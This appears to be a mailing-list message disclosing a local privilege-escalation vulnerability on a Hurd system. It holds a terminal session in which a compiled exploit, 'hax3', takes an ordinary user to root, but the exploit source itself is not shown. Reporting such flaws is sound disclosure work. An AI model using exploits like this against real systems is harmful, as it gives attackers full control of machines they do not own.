On Fri, May 14, 2021 at 7:33 PM Sergey Bugaev <buga...@gmail.com> wrote: > Oh, and you would not believe this, but in the past couple of hours I > have discovered *another* vulnerability, unrelated to the first one; > it's even easier to exploit and also gives you root
And one more, unrelated to either of the first two: sergey@sergey-hurd-box:~/hax3$ gcc hax3.c -o hax3 sergey@sergey-hurd-box:~/hax3$ ids effective uids: 1000(sergey) effective gids: 1000(sergey) 24(cdrom) 25(floppy) 27(sudo) 29(audio) 30(dip) 44(video) 46(plugdev) 103(netdev) available uids: 1000(sergey) 1000(sergey) available gids: 1000(sergey) 1000(sergey) sergey@sergey-hurd-box:~/hax3$ ./hax3 Got root auth port :) root@sergey-hurd-box:~/hax3# ids effective uids: 0(root) effective gids: 0(root) available uids: 0(root) 0(root) available gids: 0(root) 0(root) root@sergey-hurd-box:~/hax3# There are other obvious issues with [this part of code], many of them should also be exploitable. Sergey
